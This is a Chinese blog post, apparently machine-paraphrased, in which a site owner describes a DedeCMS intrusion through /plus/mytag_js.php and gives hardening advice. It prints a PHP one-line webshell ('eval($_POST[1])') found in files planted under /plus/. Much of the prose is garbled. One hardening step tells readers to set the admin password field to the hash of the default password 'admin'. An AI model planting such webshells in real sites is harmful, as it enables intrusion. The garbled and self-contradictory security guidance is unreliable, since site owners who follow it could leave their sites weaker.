dedecms一直是挺火的建站cms，关键归功于两大站长论坛的大力支持;但是，人火是是非非多，cms太爆火一样会被居心叵测的人看上。一个网站一直在应用dedecms，前不久又一次遭受进攻，进攻的目地非常简单，那麼就是暗链，了解后略微改动下编码就修复了，并不是很严重;这段时间网址又被莫名其妙文件上传，相近前一次，尽管另一方还不等他改动网站模版，但是这表明网站安全性防范还未及时，另一方任何时刻都很有可能再度获得访问权限，因此要需注意网址的安全性防范对策。

　　由于我较为喜爱寻根究底，因此就要在网上找了一下有关的材料，发觉这的确是dedecms的系统漏洞，网络黑客能够 运用多维度的自变量绕开正则表达式检验，系统漏洞关键产生在/plus/mytag_js.php中，基本原理就是提前准备一个MySQL数据库查询来进攻已经知道网址的数据库查询，根据向数据库查询中载入一句话的编码，要是取得成功载入，那麼之后便能够 运用这种编码来得到 后台管理访问权限。

　　融合一个网站黑客攻击早已他人相近的历经看来，网络黑客载入的文档关键存有于/plus/文件夹名称下，现阶段已经知道的好多个文档包含ga.php、log.php、b.php、b1.php等，文档的特点就是简短，內容非常少，很有可能载入的情况下并不是很便捷，但是这种编码的功效的确很大的。

　　下边它是ga.php文件中的一部分编码：

<title>login</title>no<?php

eval($_POST[1])

?>

<title>login</title>no<?php

eval($_POST[1])

?>

<title>login</title>no<?php

eval($_POST[1])

?>

 

　　具体的编码比上边提取的更长，但是全是这一段编码的反复，对于log.php的编码，同这一相近，仅有一句话，简洁明了，假如你对网络信息安全稍有掌握，那麼会了解是php一句话木马，应用一部分特定的专用工具能够 实行这一段编码，预估是破解密码的作用。

　　即然早已了解另一方是运用哪些的系统漏洞，另外了解另一方运用哪些的基本原理来运用系统漏洞，那麼要怎么预防这种风险的事产生呢?历经查寻很多的材料，我基本梳理出下边这种防止系统漏洞被运用的流程，期待对一样可用dedecms的网站站长小伙伴们有一定的协助。

　　一、升級版本号打好补丁下载设定文件目录管理权限

　　它是官方网对于此事的解决方案，无论你应用的是啥版本号的dedecms，必须立即在后台管理升級版本号自动升级补丁下载，它是防止系统漏洞被运用的最重要的一步;另外官方网还出示设定文件目录的方式 ，主要是设定data、templets、uploads、a为可读写能力不能实行管理权限;include、member、plus、管理后台文件目录等设定为可实行可读不能载入管理权限;删掉install及special文件目录，实际怎么设置见官方网表明。

　　二、改动admin账户及登陆密码

　　网络黑客可能是运用默认设置admin账户，接着推断登陆密码来破译的，因此改动默认设置的admin账户十分关键，对于如何修改，方式 许多 ，较为合理的是用phpadmin登录网址数据库查询，寻找dede_admin数据库表(dede是数据库表作为前缀)，改动在其中userid及pwd二项，在其中登陆密码一定要改动成f297a57a5a743894a0e4，它是默认设置的登陆密码admin;改动后去后台管理，登录dede后台管理后更改密码。

　　三、其他特别注意的地区

　　对于大量的关键点，一样要留意，尽可能别挑选太便宜的室内空间，太便宜的室内空间非常容易出現网络服务器自身的安全隐患，要是网络服务器出現难题，全部网络服务器下边的网址都没救了。也有就是，假如没必要，尽可能别注册会员申请注册哪些的，应用起來很不便;对于网站后台管理文件目录，不必写到robots.txt里边，另外每个月最少换一次，用户名和密码哪些的一样要拆换，防止和其他账户密码同样被推断出去。

　　历经这几回网址黑客攻击的案例，不得不承认，互联网技术并不是一个能够 舒心睡长觉的网，做为网站站长，算作织网的人，更应当重视网络信息安全;要是依照规定去保证了这种预防措施，不用说100%，最少95%的很有可能不容易被成功获得后台管理管理权限。